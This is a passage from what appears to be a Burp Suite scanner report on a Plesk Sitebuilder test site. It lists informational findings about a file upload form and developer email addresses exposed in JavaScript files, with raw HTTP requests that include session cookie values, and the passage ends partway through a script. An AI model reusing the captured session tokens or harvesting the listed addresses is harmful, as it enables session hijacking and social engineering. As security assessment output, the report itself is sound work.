Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Category/Edit

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Update

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7. Email addresses disclosed previous next
There are 7 instances of this issue:

/Wizard/Edit/Modules/Image
/js/Wizard/SiteFamilies.js
/js/Wizard/Status.js
/js/externals/scriptaculous/controls.js
/js/externals/scriptaculous/dragdrop.js
/localizedimage.php
/wysiwyg/BlockModule.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

7.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/Image

Issue detail

The following email address was disclosed in the response:

bugreport@parallels.com

Request

GET /Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

7.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/SiteFamilies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/js/Wizard/SiteFamilies.js

Issue detail

The following email address was disclosed in the response:

epalchukovsky@swsoft.com

Request

GET /js/Wizard/SiteFamilies.js?5.0.0.2009110318 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Start
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:32:58 GMT
Connection: close
Content-Length: 3153

/**
* Site family chosing
*
* @author Evgueni Palchukovsky <epalchukovsky@swsoft.com>
* @version $Id: SiteFamilies.js 29054 2008-06-11 11:03:51Z aiskrenkov $
* @since 2005/05/02
* @package SB
* @subpackage Wizard
* @copyright (c) 2004-2006, SWsoft
*/
function SiteFamilies(controlId) {
   this.collection        = new Array();
   this.imageNotActive    = '';
   this.imageDisabled    = '';
   this.imageHighLight    = '';
   this.imageActive    = '';
   this.colorHighLight    = '';
   this.colorDisabled    = '';
   this.colorActive    = '';
   this.control        = document.getElementById(controlId);
}

SiteFamilies.prototype.register = function(familiaId, familiaControlId) {
   var familiaControl = new Object();
   familiaControl.id = familiaId;
   familiaControl.image = document.getElementById(familiaControlId);
   for (    familiaControl.background = familiaControl.image.parentNode;
           familiaControl.background.tagName != 'TABLE';
           familiaControl.background = familiaControl.background.parentNode);
   this.collection.push(familiaControl);
}

SiteFamilies.prototype.activate = function(backgoundControl) {
   $('StatusMessage').update(SbGetLocaleByKey('SITE-FAMILY-CHANGED'));
   $('StatusIcon').src = sbSkinPath + '/images/icon_info.gif';

   this._processFamiliaActions(backgoundControl, this._processActivate, this._processHighLightOff);
}

SiteFamilies.prototype.highLightOn = function(backgoundControl) {
   this._processFamiliaActions(backgoundControl, this._processHighLightOn);
}

SiteFamilies.prototype.highLightOff = function(backgoundControl) {
   this._processFamiliaActions(backgoundControl, this._processHighLightOff);
}

SiteFamilies.prototype._processFamiliaActions = function(backgroundControl, chosenAction, notChosenAction) {
   var chosenFamilia = null;
   for (var i = 0; i < this.collection.length; ++i) {
       if (this.collection[i].background == backgroundControl) {
           chosenFamilia = this.collection[i];
       }
   }
   if (chosenFamilia.id != this.control.value) {
       if (chosenAction) {
           chosenAction(this, chosenFamilia);
       }
       if (notChosenAction) {
           for (var i = 0; i < this.collection.length; ++i) {
               if (this.collection[i] != chosenFamilia) {
                   notChosenAction(this, this.collection[i]);
               }
           }
       }
   }
}

SiteFamilies.prototype._processHighLightOn = function(object, familia) {
   if (object.control.value != familia.id) {
       familia.background.style.borderColor = object.colorHighLight;
       familia.image.src = object.imageHighLight;
       $(familia.background).setStyle({ cursor: 'pointer' });
   }
}

SiteFamilies.prototype._processHighLightOff = function(object, familia) {
   if (object.control.value != familia.id) {
       familia.background.style.borderColor = object.colorDisabled;
       familia.image.src = object.imageDisabled;
       $(familia.background).setStyle({ cursor: '' });
   }
}

SiteFamilies.prototype._processActivate = function(object, familia) {
   if (object.control.value != familia.id) {
       familia.background.style.borderColor = object.colorActive;
       familia.image.src = object.imageActive;
       $(familia.background).setStyle({ cursor: '' });
       object.control.value = familia.id;
       sbApplyChangesObject.registerChange();
       sbApplyChangesObject.registerForcedSaving();
   }
}

7.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/Status.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/js/Wizard/Status.js

Issue detail

The following email address was disclosed in the response:

epalchukovsky@swsoft.com

Request

GET /js/Wizard/Status.js?5.0.0.2009110318 HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:41 GMT
Content-Length: 3625

/**
* Status
*
* @author Evgueni Palchukovsky <epalchukovsky@swsoft.com>
* @version $Id: Status.js 29054 2008-06-11 11:03:51Z aiskrenkov $
* @since 2005/05/18
* @package SB
* @subpackage Wizard
* @copyright (c) 2004-2006, SWsoft
*/

var HELP    = 0;
var INFO    = 1;
var WARNING    = 3;
var ERROR    = 2;

function SB_Status(stylePath) {
   this.stylePath = stylePath;
   this.iconControl = document.getElementById('StatusIcon');
   this.barControl = document.getElementById('StatusBar');
   this.messageControl = document.getElementById('StatusMessage');
   this.detailsControl = document.getElementById('StatusDetailed');
   this.detailedMessagesControl = document.getElementById('StatusDetailedMessages').tBodies[0];
   this.lastAddedMessegeStyle = 1;
   this.policies = new Array();
   this.policies[INFO] = new function() {
       this.statusIcon = 'icon_info.gif';
       this.messageIcon = 'information.gif';
   }
   this.policies[WARNING] = new function() {
       this.statusIcon = 'icon_stop.gif';
       this.messageIcon = 'warning.gif';
   }
   this.policies[ERROR] = new function() {
       this.statusIcon = 'icon_stop.gif';
       this.messageIcon = 'critical.gif';
   }
   this.policies[HELP] = new function() {
       this.statusIcon = 'icon_help.gif';
       this.messageIcon = 'information.gif';
   }
   this.messages = Array();
}

SB_Status.prototype.set = function(message, statusCode) {
   this.iconControl.src = this.stylePath+'/images/'+this.policies[statusCode].statusIcon;
   this.messageControl.innerHTML = message;
}

SB_Status.prototype.setByKey = function(messageKey, statusCode) {
   this.iconControl.src = this.stylePath+'/images/'+this.policies[statusCode].statusIcon;
   this.messageControl.innerHTML = SbGetLocaleByKey(messageKey);
}

SB_Status.prototype.filterDetails = function(statusCode) {
   this.clearDetailsList();
   for (var i = 0; i<this.messages.length; ++i) {
       var m = this.messages[i];
       if (statusCode == 0 || m.statusCode == statusCode) {
           this.addDetailedMessageInList(m.number, m.message, m.statusCode);
       }
   }
}

SB_Status.prototype.showDetails = function() {
   if (this.messages.length) {
       this.detailsControl.show();
   }
}

SB_Status.prototype.hideDetails = function() {
   this.detailsControl.hide();
}

SB_Status.prototype.clearDetails = function() {
   this.clearDetailsList();
   this.messages = Array();
   this.barControl.style.cursor = 'default';
   this.messageControl.style.cursor = 'default';
}

SB_Status.prototype.clearDetailsList = function() {
   var trs = this.detailedMessagesControl.getElementsByTagName('TR');
   for (var i = trs.length-1; i>2; --i) {
       this.detailedMessagesControl.removeChild(trs[i]);
   }
   this.lastAddedMessegeStyle = 1;
}

SB_Status.prototype.addDetailedMessage = function(message, statusCode) {
   var m = new SB_StatusDetailedMessage(this.messages.length+1, message, statusCode);
   this.messages.push(m);
   this.addDetailedMessageInList(m.number, m.message, m.statusCode);
   this.barControl.style.cursor = 'pointer';
}

SB_Status.prototype.addDetailedMessageInList = function(number, message, statusCode) {
   var trs = this.detailedMessagesControl.getElementsByTagName('TR');
   var tr = trs[this.lastAddedMessegeStyle].cloneNode(true);
   var tds = tr.getElementsByTagName('TD');
   tds[0].innerHTML = number;
   tds[1].innerHTML = '<img src="'+this.stylePath+'/icons/'+this.policies[statusCode].messageIcon+'" alt="">';
   tds[2].innerHTML = message;
   tr.removeAttribute("style");
   this.detailedMessagesControl.appendChild(tr);
   this.lastAddedMessegeStyle = this.lastAddedMessegeStyle==1 ? 2 : 1;
}

function SB_StatusDetailedMessage(number, message, statusCode) {
   this.message = message;
   this.statusCode = statusCode;
   this.number = number;
}

7.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/js/externals/scriptaculous/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /js/externals/scriptaculous/controls.js?1.8.0 HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=domains

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:58 GMT
Content-Length: 34927

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (http://blogs.law.harvard.edu/ivan)
// (c) 2005-2007 Jon Tirsen (http://www.tirsen.com)
// Contributors:
// Richard Livsey
// Rahul Bhargava
// Rob Wills
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

// Autocompleter.Base handles all the autocompletion functionality
// that's independent of the data source for autocompletion. This
// includes drawing the autocompletion menu, observing keyboard
// and mouse events, and similar.
//
// Specific autocompleters need to provide, at the very least,
// a getUpdatedChoices function that will be invoked every time
// the text inside the monitored textbox changes. This method
// should get the text for which to provide autocompletion by
// invoking this.getToken(), NOT by directly accessing
// this.element.value. This is to allow incremental tokenized
// autocompletion. Specific auto-completion logic (AJAX, etc)
// belongs in getUpdatedChoices.
//
// Tokenized incremental autocompletion is enabled automatically
// when an autocompleter is instantiated with the 'tokens' option
// in the options parameter, e.g.:
// new Ajax.Autocompleter('id','upd', '/url/', { tokens: ',' });
// will incrementally autocomplete with a comma as the token.
// Additionally, ',' in the above example can be replaced with
// a token array, e.g. { tokens: [',', '\n'] } which
// enables autocompletion on multiple tokens. This is most
// useful when one of the tokens is \n (a newline), as it
// allows smart autocompletion after linebreaks.

if(typeof Effect == 'undefined')
throw("controls.js requires including script.aculo.us' effects.js library");

var Autocompleter = { }
Autocompleter.Base = Class.create({
baseInitialize: function(element, update, options) {
element = $(element)
this.element = element;
this.update = $(update);
this.hasFocus = false;
this.changed = false;
this.active = false;
this.index = 0;
this.entryCount = 0;
this.oldElementValue = this.element.value;

if(this.setOptions)
this.setOptions(options);
else
this.options = options || { };

this.options.paramName = this.options.paramName || this.element.name;
this.options.tokens = this.options.tokens || [];
this.options.frequency = this.options.frequency || 0.4;
this.options.minChars = this.options.minChars || 1;
this.options.onShow = this.options.onShow ||
function(element, update){
if(!update.style.position || update.style.position=='absolute') {
update.style.position = 'absolute';
Position.clone(element, update, {
setHeight: false,
offsetTop: element.offsetHeight
});
}
Effect.Appear(update,{duration:0.15});
};
this.options.onHide = this.options.onHide ||
function(element, update){ new Effect.Fade(update,{duration:0.15}) };

if(typeof(this.options.tokens) == 'string')
this.options.tokens = new Array(this.options.tokens);
// Force carriage returns as token delimiters anyway
if (!this.options.tokens.include('\n'))
this.options.tokens.push('\n');

this.observer = null;

this.element.setAttribute('autocomplete','off');

Element.hide(this.update);

Event.observe(this.element, 'blur', this.onBlur.bindAsEventListener(this));
Event.observe(this.element, 'keypress', this.onKeyPress.bindAsEventListener(this));
},

show: function() {
if(Element.getStyle(this.update, 'display')=='none') this.options.onShow(this.element, this.update);
if(!this.iefix &&
(Prototype.Browser.IE) &&
(Element.getStyle(this.update, 'position')=='absolute')) {
new Insertion.After(this.update,
'<iframe id="' + this.update.id + '_iefix" '+
'style="display:none;position:absolute;filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ' +
'src="javascript:false;" frameborder="0" scrolling="no"></iframe>');
this.iefix = $(this.update.id+'_iefix');
}
if(this.iefix) setTimeout(this.fixIEOverlapping.bind(this), 50);
},

fixIEOverlapping: function() {
Position.clone(this.update, this.iefix, {setTop:(!this.update.style.height)});
this.iefix.style.zIndex = 1;
this.update.style.zIndex = 2;
Element.show(this.iefix);
},

hide: function() {
this.stopIndicator();
if(Element.getStyle(this.update, 'display')!='none') this.options.onHide(this.element, this.update);
if(this.iefix) Element.hide(this.iefix);
},

startIndicator: function() {
if(this.options.indicator) Element.show(this.options.indicator);
},

stopIndicator: function() {
if(this.options.indicator) Element.hide(this.options.indicator);
},

onKeyPress: function(event) {
if(this.active)
switch(event.keyCode) {
case Event.KEY_TAB:
case Event.KEY_RETURN:
this.selectEntry();
Event.stop(event);
case Event.KEY_ESC:
this.hide();
this.active = false;
Event.stop(event);
return;
case Event.KEY_LEFT:
case Event.KEY_RIGHT:
return;
case Event.KEY_UP:
this.markPrevious();
this.render();
if(Prototype.Browser.WebKit) Event.stop(event);
return;
case Event.KEY_DOWN:
this.markNext();
this.render();
if(Prototype.Browser.WebKit) Event.stop(event);
return;
}
else
if(event.keyCode==Event.KEY_TAB || event.keyCode==Event.KEY_RETURN ||
(Prototype.Browser.WebKit > 0 && event.keyCode == 0)) return;

this.changed = true;
this.hasFocus = true;

if(this.observer) clearTimeout(this.observer);
this.observer =
setTimeout(this.onObserverEvent.bind(this), this.options.frequency*1000);
},

activate: function() {
this.changed = false;
this.hasFocus = true;
this.getUpdatedChoices();
},

onHover: function(event) {
var element = Event.findElement(event, 'LI');
if(this.index != element.autocompleteIndex)
{
this.index = element.autocompleteIndex;
this.render();
}
Event.stop(event);
},

onClick: function(event) {
var element = Event.findElement(event, 'LI');
this.index = element.autocompleteIndex;
this.selectEntry();
this.hide();
},

onBlur: function(event) {
// needed to make click events working
setTimeout(this.hide.bind(this), 250);
this.hasFocus = false;
this.active = false;
},

render: function() {
if(this.entryCount > 0) {
for (var i = 0; i < this.entryCount; i++)
this.index==i ?
Element.addClassName(this.getEntry(i),"selected") :
Element.removeClassName(this.getEntry(i),"selected");
if(this.hasFocus) {
this.show();
this.active = true;
}
} else {
this.active = false;
this.hide();
}
},

markPrevious: function() {
if(this.index > 0) this.index--
else this.index = this.entryCount-1;
this.getEntry(this.index).scrollIntoView(true);
},

markNext: function() {
if(this.index < this.entryCount-1) this.index++
else this.index = 0;
this.getEntry(this.index).scrollIntoView(false);
},

getEntry: function(index) {
return this.update.firstChild.childNodes[index];
},

getCurrentEntry: function() {
return this.getEntry(this.index);
},

selectEntry: function() {
this.active = false;
this.updateElement(this.getCurrentEntry());
},

updateElement: function(selectedElement) {
if (this.options.updateElement) {
this.options.updateElement(selectedElement);
return;
}
var value = '';
if (this.options.select) {
var nodes = $(selectedElement).select('.' + this.options.select) || [];
if(nodes.length>0) value = Element.collectTextNodes(nodes[0], this.options.select);
} else
value = Element.collectTextNodesIgnoreClass(selectedElement, 'informal');

var bounds = this.getTokenBounds();
if (bounds[0] != -1) {
var newValue = this.element.value.substr(0, bounds[0]);
var whitespace = this.element.value.substr(bounds[0]).match(/^\s+/);
if (whitespace)
newValue += whitespace[0];
this.element.value = newValue + value + this.element.value.substr(bounds[1]);
} else {
this.element.value = value;
}
this.oldElementValue = this.element.value;
this.element.focus();

if (this.options.afterUpdateElement)
this.options.afterUpdateElement(this.element, selectedElement);
},

updateChoices: function(choices) {
if(!this.changed && this.hasFocus) {
this.update.innerHTML = choices;
Element.cleanWhitespace(this.update);
Element.cleanWhitespace(this.update.down());

if(this.update.firstChild && this.update.down().childNodes) {
this.entryCount =
this.update.down().childNodes.length;
for (var i = 0; i < this.entryCount; i++) {
var entry = this.getEntry(i);
entry.autocompleteIndex = i;
this.addObservers(entry);
}
} else {
this.entryCount = 0;
}

this.stopIndicator();
this.index = 0;

if(this.entryCount==1 && this.options.autoSelect) {
this.selectEntry();
this.hide();
} else {
this.render();
}
}
},

addObservers: function(element) {
Event.observe(element, "mouseover", this.onHover.bindAsEventListener(this));
Event.observe(element, "click", this.onClick.bindAsEventListener(this));
},

onObserverEvent: function() {
this.changed = false;
this.tokenBounds = null;
if(this.getToken().length>=this.options.minChars) {
this.getUpdatedChoices();
} else {
this.active = false;
this.hide();
}
this.oldElementValue = this.element.value;
},

getToken: function() {
var bounds = this.getTokenBounds();
return this.element.value.substring(bounds[0], bounds[1]).strip();
},

getTokenBounds: function() {
if (null != this.tokenBounds) return this.tokenBounds;
var value = this.element.value;
if (value.strip().empty()) return [-1, 0];
var diff = arguments.callee.getFirstDifferencePos(value, this.oldElementValue);
var offset = (diff == this.oldElementValue.length ? 1 : 0);
var prevTokenPos = -1, nextTokenPos = value.length;
var tp;
for (var index = 0, l = this.options.tokens.length; index < l; ++index) {
tp = value.lastIndexOf(this.options.tokens[index], diff + offset - 1);
if (tp > prevTokenPos) prevTokenPos = tp;
tp = value.indexOf(this.options.tokens[index], diff + offset);
if (-1 != tp && tp < nextTokenPos) nextTokenPos = tp;
}
return (this.tokenBounds = [prevTokenPos + 1, nextTokenPos]);
}
});

Autocompleter.Base.prototype.getTokenBounds.getFirstDifferencePos = function(newS, oldS) {
var boundary = Math.min(newS.length, oldS.length);
for (var index = 0; index < boundary; ++index)
if (newS[index] != oldS[index])
return index;
return boundary;
};

Ajax.Autocompleter = Class.create(Autocompleter.Base, {
initialize: function(element, update, url, options) {
this.baseInitialize(element, update, options);
this.options.asynchronous = true;
this.options.onComplete = this.onComplete.bind(this);
this.options.defaultParams = this.options.parameters || null;
this.url = url;
},

getUpdatedChoices: function() {
this.startIndicator();

var entry = encodeURIComponent(this.options.paramName) + '=' +
encodeURIComponent(this.getToken());

this.options.parameters = this.options.callback ?
this.options.callback(this.element, entry) : entry;

if(this.options.defaultParams)
this.options.parameters += '&' + this.options.defaultParams;

new Ajax.Request(this.url, this.options);
},

onComplete: function(request) {
this.updateChoices(request.responseText);
}
});

// The local array autocompleter. Used when you'd prefer to
// inject an array of autocompletion options into the page, rather
// than sending out Ajax queries, which can be quite slow sometimes.
//
// The constructor takes four parameters. The first two are, as usual,
// the id of the monitored textbox, and id of the autocompletion menu.
// The third is the array you want to autocomplete from, and the fourth
// is the options block.
//
// Extra local autocompletion options:
// - choices - How many autocompletion choices to offer
//
// - partialSearch - If false, the autocompleter will match entered
// text only at the beginning of strings in the
// autocomplete array. Defaults to true, which will
// match text at the beginning of any *word* in the
// strings in the autocomplete array. If you want to
// search anywhere in the string, additionally set
// the option fullSearch to true (default: off).
//
// - fullSsearch - Search anywhere in autocomplete array strings.
//
// - partialChars - How many characters to enter before triggering
// a partial match (unlike minChars, which defines
// how many characters are required to do any match
// at all). Defaults to 2.
//
// - ignoreCase - Whether to ignore case when autocompleting.
// Defaults to true.
//
// It's possible to pass in a custom function as the 'selector'
// option, if you prefer to write your own autocompletion logic.
// In that case, the other options above will not apply unless
// you support them.

Autocompleter.Local = Class.create(Autocompleter.Base, {
initialize: function(element, update, array, options) {
this.baseInitialize(element, update, options);
this.options.array = array;
},

getUpdatedChoices: function() {
this.updateChoices(this.options.selector(this));
},

setOptions: function(options) {
this.options = Object.extend({
choices: 10,
partialSearch: true,
partialChars: 2,
ignoreCase: true,
fullSearch: false,
selector: function(instance) {
var ret = []; // Beginning matches
var partial = []; // Inside matches
var entry = instance.getToken();
var count = 0;

for (var i = 0; i < instance.options.array.length &&
ret.length < instance.options.choices ; i++) {

var elem = instance.options.array[i];
var foundPos = instance.options.ignoreCase ?
elem.toLowerCase().indexOf(entry.toLowerCase()) :
elem.indexOf(entry);

while (foundPos != -1) {
if (foundPos == 0 && elem.length != entry.length) {
ret.push("<li><strong>" + elem.substr(0, entry.length) + "</strong>" +
elem.substr(entry.length) + "</li>");
break;
} else if (entry.length >= instance.options.partialChars &&
instance.options.partialSearch && foundPos != -1) {
if (instance.options.fullSearch || /\s/.test(elem.substr(foundPos-1,1))) {
partial.push("<li>" + elem.substr(0, foundPos) + "<strong>" +
elem.substr(foundPos, entry.length) + "</strong>" + elem.substr(
foundPos + entry.length) + "</li>");
break;
}
}

foundPos = instance.options.ignoreCase ?
elem.toLowerCase().indexOf(entry.toLowerCase(), foundPos + 1) :
elem.indexOf(entry, foundPos + 1);

}
}
if (partial.length)
ret = ret.concat(partial.slice(0, instance.options.choices - ret.length))
return "<ul>" + ret.join('') + "</ul>";
}
}, options || { });
}
});

// AJAX in-place editor and collection editor
// Full rewrite by Christophe Porteneuve <tdd@tddsworld.com> (April 2007).

// Use this if you notice weird scrolling problems on some browsers,
// the DOM might be a bit confused when this gets called so do this
// waits 1 ms (with setTimeout) until it does the activation
Field.scrollFreeActivate = function(field) {
setTimeout(function() {
Field.activate(field);
}, 1);
}

Ajax.InPlaceEditor = Class.create({
initialize: function(element, url, options) {
this.url = url;
this.element = element = $(element);
this.prepareOptions();
this._controls = { };
arguments.callee.dealWithDeprecatedOptions(options); // DEPRECATION LAYER!!!
Object.extend(this.options, options || { });
if (!this.options.formId && this.element.id) {
this.options.formId = this.element.id + '-inplaceeditor';
if ($(this.options.formId))
this.options.formId = '';
}
if (this.options.externalControl)
this.options.externalControl = $(this.options.externalControl);
if (!this.options.externalControl)
this.options.externalControlOnly = false;
this._originalBackground = this.element.getStyle('background-color') || 'transparent';
this.element.title = this.options.clickToEditText;
this._boundCancelHandler = this.handleFormCancellation.bind(this);
this._boundComplete = (this.options.onComplete || Prototype.emptyFunction).bind(this);
this._boundFailureHandler = this.handleAJAXFailure.bind(this);
this._boundSubmitHandler = this.handleFormSubmission.bind(this);
this._boundWrapperHandler = this.wrapUp.bind(this);
this.registerListeners();
},
checkForEscapeOrReturn: function(e) {
if (!this._editing || e.ctrlKey || e.altKey || e.shiftKey) return;
if (Event.KEY_ESC == e.keyCode)
this.handleFormCancellation(e);
else if (Event.KEY_RETURN == e.keyCode)
this.handleFormSubmission(e);
},
createControl: function(mode, handler, extraClasses) {
var control = this.options[mode + 'Control'];
var text = this.options[mode + 'Text'];
if ('button' == control) {
var btn = document.createElement('input');
btn.type = 'submit';
btn.value = text;
btn.className = 'editor_' + mode + '_button';
if ('cancel' == mode)
btn.onclick = this._boundCancelHandler;
this._form.appendChild(btn);
this._controls[mode] = btn;
} else if ('link' == control) {
var link = document.createElement('a');
link.href = '#';
link.appendChild(document.createTextNode(text));
link.onclick = 'cancel' == mode ? this._boundCancelHandler : this._boundSubmitHandler;
link.className = 'editor_' + mode + '_link';
if (extraClasses)
link.className += ' ' + extraClasses;
this._form.appendChild(link);
this._controls[mode] = link;
}
},
createEditField: function() {
var text = (this.options.loadTextURL ? this.options.loadingText : this.getText());
var fld;
if (1 >= this.options.rows && !/\r|\n/.test(this.getText())) {
fld = document.createElement('input');
fld.type = 'text';
var size = this.options.size || this.options.cols || 0;
if (0 < size) fld.size = size;
} else {
fld = document.createElement('textarea');
fld.rows = (1 >= this.options.rows ? this.options.autoRows : this.options.rows);
fld.cols = this.options.cols || 40;
}
fld.name = this.options.paramName;
fld.value = text; // No HTML breaks conversion anymore
fld.className = 'editor_field';
if (this.options.submitOnBlur)
fld.onblur = this._boundSubmitHandler;
this._controls.editor = fld;
if (this.options.loadTextURL)
this.loadExternalText();
this._form.appendChild(this._controls.editor);
},
createForm: function() {
var ipe = this;
function addText(mode, condition) {
var text = ipe.options['text' + mode + 'Controls'];
if (!text || condition === false) return;
ipe._form.appendChild(document.createTextNode(text));
};
this._form = $(document.createElement('form'));
this._form.id = this.options.formId;
this._form.addClassName(this.options.formClassName);
this._form.onsubmit = this._boundSubmitHandler;
this.createEditField();
if ('textarea' == this._controls.editor.tagName.toLowerCase())
this._form.appendChild(document.createElement('br'));
if (this.options.onFormCustomization)
this.options.onFormCustomization(this, this._form);
addText('Before', this.options.okControl || this.options.cancelControl);
this.createControl('ok', this._boundSubmitHandler);
addText('Between', this.options.okControl && this.options.cancelControl);
this.createControl('cancel', this._boundCancelHandler, 'editor_cancel');
addText('After', this.options.okControl || this.options.cancelControl);
},
destroy: function() {
if (this._oldInnerHTML)
this.element.innerHTML = this._oldInnerHTML;
this.leaveEditMode();
this.unregisterListeners();
},
enterEditMode: function(e) {
if (this._saving || this._editing) return;
this._editing = true;
this.triggerCallback('onEnterEditMode');
if (this.options.externalControl)
this.options.externalControl.hide();
this.element.hide();
this.createForm();
this.element.parentNode.insertBefore(this._form, this.element);
if (!this.options.loadTextURL)
this.postProcessEditField();
if (e) Event.stop(e);
},
enterHover: function(e) {
if (this.options.hoverClassName)
this.element.addClassName(this.options.hoverClassName);
if (this._saving) return;
this.triggerCallback('onEnterHover');
},
getText: function() {
return this.element.innerHTML;
},
handleAJAXFailure: function(transport) {
this.triggerCallback('onFailure', transport);
if (this._oldInnerHTML) {
this.element.innerHTML = this._oldInnerHTML;
this._oldInnerHTML = null;
}
},
handleFormCancellation: function(e) {
this.wrapUp();
if (e) Event.stop(e);
},
handleFormSubmission: function(e) {
var form = this._form;
var value = $F(this._controls.editor);
this.prepareSubmission();
var params = this.options.callback(form, value) || '';
if (Object.isString(params))
params = params.toQueryParams();
params.editorId = this.element.id;
if (this.options.htmlResponse) {
var options = Object.extend({ evalScripts: true }, this.options.ajaxOptions);
Object.extend(options, {
parameters: params,
onComplete: this._boundWrapperHandler,
onFailure: this._boundFailureHandler
});
new Ajax.Updater({ success: this.element }, this.url, options);
} else {
